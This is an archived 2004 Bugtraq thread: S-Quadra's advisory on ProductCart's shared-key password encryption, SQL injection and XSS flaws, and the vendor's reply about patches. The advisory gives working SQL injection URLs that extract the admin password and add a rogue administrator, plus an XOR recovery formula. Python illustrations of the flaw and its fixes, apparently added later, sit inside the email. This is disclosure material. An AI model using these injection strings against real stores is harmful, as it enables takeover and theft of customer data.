From research@s-quadra.com Wed Feb 18 16:35:38 2004
From: S-Quadra Security Research
To: bugtraq
Date: Wed, 18 Feb 2004 11:14:48 +0300
Subject: EarlyImpact ProductCart shopping cart software multiple security vulnerabilities

S-Quadra Advisory #2004-02-16

Topic: EarlyImpact ProductCart shopping cart software multiple security vulnerabilities
Severity: High
Vendor URL: http://www.earlyimpact.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20040216.txt
Release date: 16 Feb 2004

1. DESCRIPTION

ProductCart is a shopping cart application for e-commerce enabled sites. It's written in ASP, works on most Windows platforms and uses MS Access or MS SQL Server as a backend. Please visit http://www.earlyimpact.com for information about the ProductCart shopping cart.

2. DETAILS

-- Vulnerability 1: Incorrect use of cryptography

ProductCart software uses a stream cipher algorithm (possibly RC4) to encrypt various passwords before storing them in a database. A stream cipher generates a keystream (a sequence of bits used as a key). Encryption is accomplished by combining the keystream with the plaintext using the bitwise XOR operation. The generation of the keystream is independent of the plaintext and ciphertext.

In ProductCart a single cryptographic key is used to encrypt all customer and store administrator passwords, so it's possible for an attacker to perform a chosen plaintext attack and obtain the first 100 bytes of keystream (the maximum length of a customer password). Using these bytes an attacker can decrypt any encrypted information in the database, including the store administrator password.

-- Vulnerability 2: SQL Injection vulnerability

An SQL Injection vulnerability has been found in the 'advSearch_h.asp' script. Improper use of user supplied input filters allows an attacker to modify the SQL query and perform some kinds of SQL injection attacks.
Successful exploitation of this vulnerability could allow an attacker to gain administrative access to the ProductCart store and read any information from the store database (i.e. customers' private data). An attacker could also execute arbitrary commands using the xp_cmdshell function.

-- Vulnerability 3: Cross Site Scripting vulnerability in 'Custva.asp'

By injecting specially crafted javascript code into the URL and tricking a user into visiting it, a remote attacker can steal the user's session id and gain access to the user's personal data.

-- PoC code

-- Vulnerability 1 and 2:

Platform: MS SQL Server as a backend

ProductCart software incorrectly uses cryptographic algorithms to protect the store administrator password. The combination of this error and the SQL injection vulnerability allows an attacker to gain administrative access to the store. By performing the following scenario an attacker can find the store administrator username and password.

Scenario:

1. An attacker registers a new customer in the store. Let the value of the 'Postal Code' field in the registration form be equal to '987654'; the attacker must select a long password (it should be longer than the store administrator password).

2. An attacker performs the following request:

http://[target]/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;u--pdate%20customers%20set%20name=(s--elect%20top%201%20idadmin%20from%20admins),lastName=(s--elect%20top%01%20adminpassword%20from%20admins),phone=(s--elect%20password%20from%20customers%20where%20zip=987654)%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33&

3. An attacker goes to http://[target]/productcart/pc/Custmoda.asp and reads his personal information. The value of the "FirstName" field in this form will be the store administrator login name.
The store administrator password is easy to find by this formula:

adminpass = (Last Name) xor (Phone) xor (customer login password from scenario step 1)

In the following scenario an attacker can add a new administrator to the store.

Scenario:

1. An attacker registers a new customer in the store. Let the value of the 'First Name' field in the registration form be equal to '1*2*3*4*5*6*7*8*9*10*', the value of the 'Last Name' field be equal to '34567', the value of the 'Password' field be equal to '111' and the value of the 'Postal Code' field be equal to '987654'.

2. An attacker performs the following request:

http://[target]/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;in--sert%20into%20admins%20(idadmin,%20adminpassword,%20adminlevel)%20s--elect%20lastName,%20password,%20name%20from%20customers%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33&

3. An attacker logs into the store admin interface with username '34567' and password '111'.

-- Vulnerability 3:

http://[target]/productcart/pc/Custva.asp?redirectUrl="><"

3. FIX INFORMATION

S-Quadra alerted the EarlyImpact development team to this issue on 29th January 2004.

4. CREDITS

Nick Gudov is responsible for discovering this issue.

5. ABOUT

S-Quadra offers services in computer security, penetration testing and network assessment, web application security, source code review and third party product vulnerability assessment, forensic support and reverse engineering.
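The following is an added illustration of the cryptographic point in Vulnerability 1 and of the proper fix; it is not code from the advisory or from ProductCart. The keystream is a toy SHA-256 counter construction standing in for whatever stream cipher the product used, the store key and passwords are constructed values, and the 100-byte limit is the maximum customer password length the advisory states. The first function models the "(Last Name) xor (Phone) xor (customer password)" relation: with one key for every record, a known plaintext/ciphertext pair exposes the shared keystream prefix and with it any shorter ciphertext. The second pair shows what a store should keep instead: a salted, iterated one-way hash, where no record shares anything with another.

```python
import hashlib
import hmac
import os

MAX_PASSWORD_LEN = 100  # maximum customer password length stated in the advisory
SALT_LEN = 16
PBKDF2_ITERATIONS = 200_000


def keystream(key: bytes, length: int) -> bytes:
    """Toy deterministic keystream (SHA-256 in counter mode), an assumption
    standing in for RC4 or any other stream cipher. For a fixed key it always
    yields the same bytes, which is exactly what makes reusing one key across
    many records unsafe."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])


def stream_encrypt(key: bytes, plaintext: bytes) -> bytes:
    """XOR plaintext with keystream; decryption is the same call."""
    return bytes(p ^ k for p, k in zip(plaintext, keystream(key, len(plaintext))))


def keystream_reuse_weakness(store_key: bytes, admin_password: bytes) -> bytes:
    """Model of the weakness: every record is encrypted under the same key, so
    a customer who knows their own plaintext and sees their own ciphertext
    learns the keystream prefix, and the administrator's (shorter) ciphertext
    decrypts with a single XOR. Returns the recovered administrator password."""
    # Constructed records: the customer chooses the longest allowed password so
    # the recovered keystream prefix covers any shorter password in the table.
    customer_password = b"A" * MAX_PASSWORD_LEN
    admin_ct = stream_encrypt(store_key, admin_password)
    customer_ct = stream_encrypt(store_key, customer_password)

    # keystream = ciphertext XOR known plaintext; it is shared by every row
    ks = bytes(c ^ p for c, p in zip(customer_ct, customer_password))
    # the advisory's formula: adminpass = admin_ct XOR customer_ct XOR customer_pt
    return bytes(c ^ k for c, k in zip(admin_ct, ks))


def hash_password(password: bytes, iterations: int = PBKDF2_ITERATIONS) -> bytes:
    """What to store instead of a reversible encryption: a per-record random
    salt plus an iterated PBKDF2-HMAC-SHA256 digest. Knowing one customer's
    password and stored value reveals nothing about any other record."""
    salt = os.urandom(SALT_LEN)
    digest = hashlib.pbkdf2_hmac("sha256", password, salt, iterations)
    return salt + digest


def verify_password(password: bytes, stored: bytes,
                    iterations: int = PBKDF2_ITERATIONS) -> bool:
    """Recompute the digest under the stored salt; constant-time comparison."""
    salt, digest = stored[:SALT_LEN], stored[SALT_LEN:]
    candidate = hashlib.pbkdf2_hmac("sha256", password, salt, iterations)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    key = os.urandom(16)
    print(keystream_reuse_weakness(key, b"s3cr3t-admin"))  # same bytes come back
    record = hash_password(b"hunter2")
    print(verify_password(b"hunter2", record), verify_password(b"hunter3", record))
```

The first function succeeds for any stream cipher, RC4 included; the defect is the static key shared across records, not the cipher's strength. Passwords that only ever need to be checked, never read back, belong in a one-way salted hash, which also removes the incentive to extract the table in the first place.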
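As a second added illustration, this time of the Vulnerability 2 pattern and its remediation, the block below is not code from the advisory or from ProductCart; it uses an in-memory SQLite table with constructed rows in place of the store's MS SQL Server backend, and the column names are assumptions. The first builder reproduces the shape of the flaw the advisory describes: a numeric-looking query-string value such as priceUntil is spliced into SQL text, so a ';' in it starts a second statement on a backend that accepts batches. The hardened search validates the numeric field against a strict pattern and binds every value as a parameter, so user input reaches the engine only as data.

```python
import re
import sqlite3

# Constructed catalogue standing in for the store's products table.
SAMPLE_PRODUCTS = [
    ("DK-001", "Dark roast coffee", 12.50),
    ("DK-002", "Dark chocolate bar", 3.25),
    ("LT-001", "Light roast coffee", 11.00),
]

# Only plain decimal numbers are acceptable for a price bound.
_PRICE = re.compile(r"\d{1,9}(\.\d{1,2})?")


def make_store() -> sqlite3.Connection:
    """Build the in-memory table the examples run against."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table products (sku text, name text, price real)")
    conn.executemany("insert into products values (?, ?, ?)", SAMPLE_PRODUCTS)
    return conn


def build_query_by_concatenation(price_until: str, keyword: str) -> str:
    """The pattern the advisory describes (assumed column names): request
    values pasted straight into SQL text. Anything after ';' in priceUntil
    becomes a second statement where the backend runs batches."""
    return ("select sku, name, price from products where price <= " + price_until
            + " and name like '%" + keyword + "%'")


def _escape_like(term: str) -> str:
    """Neutralise LIKE wildcards so a keyword matches literally."""
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_products(conn: sqlite3.Connection, price_until: str, keyword: str) -> list:
    """Hardened search: strict validation of the numeric field plus bound
    parameters for both values. Returns the matching SKUs in order."""
    if not _PRICE.fullmatch(price_until):
        raise ValueError("priceUntil must be a plain number")
    rows = conn.execute(
        "select sku from products where price <= ? and name like ? escape '\\' "
        "order by sku",
        (float(price_until), "%" + _escape_like(keyword) + "%"),
    )
    return [r[0] for r in rows.fetchall()]


if __name__ == "__main__":
    db = make_store()
    print(search_products(db, "999", "dark"))
    try:
        search_products(db, "999;select 1", "dark")
    except ValueError as exc:
        print("rejected:", exc)
```

Rejecting the value before it reaches the query is what closes the hole; binding it as a parameter is the second, independent layer. The LIKE escaping is a separate nicety so that '%' and '_' in a keyword cannot widen the match.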
S-Quadra Advisory #2004-02-16

From info@earlyimpact.com Wed Feb 18 16:35:53 2004
From: Massimo Arrigoni
To: bugtraq@securityfocus.com
Date: 18 Feb 2004 17:27:32 -0000
Subject: Re: EarlyImpact ProductCart shopping cart software multiple security vulnerabilities
In-Reply-To: <40331EF8.6000700@s-quadra.com>

Regarding: S-Quadra Advisory #2004-02-16
http://www.securityfocus.com/archive/1/354288/2004-02-15/2004-02-21/0

S-Quadra was given specific information about available fixes and other comments related to the alleged security vulnerabilities. Yet they decided not to post any of them. This behavior seems highly unprofessional.

The following is Early Impact's official response to the alleged vulnerabilities concerning the company's ProductCart ecommerce software.

-- Vulnerability 1: Incorrect use of cryptography

Early Impact official response: Vulnerability 1 cannot be exploited since vulnerability 2 and 3 have been addressed. Nevertheless, Early Impact is further investigating the issue and will look at alternative uses of cryptography for future versions of ProductCart.

-- Vulnerability 2: SQL Injection vulnerability

Early Impact official response: Vulnerability 2 was addressed with the Security Patch released on 01.30.2004, which is available for download at no charge from http://www.earlyimpact.com/productcart/support/ - This vulnerability does not apply to ProductCart v2.53 and above. All users of ProductCart v2.52 and below were notified of this security issue and of the availability of the corresponding Security Patch upon its release.

-- Vulnerability 3: Cross Site Scripting vulnerability in 'Custva.asp'

Early Impact official response: Vulnerability 3 was addressed with the Security Patch released on 01.30.2004, which is available for download at no charge from http://www.earlyimpact.com/productcart/support/ - This vulnerability does not apply to ProductCart v2.53 and above. All users of ProductCart v2.52 and below were notified of this security issue and of the availability of the corresponding Security Patch upon its release.

If you need additional information, please contact Early Impact at info@earlyimpact.com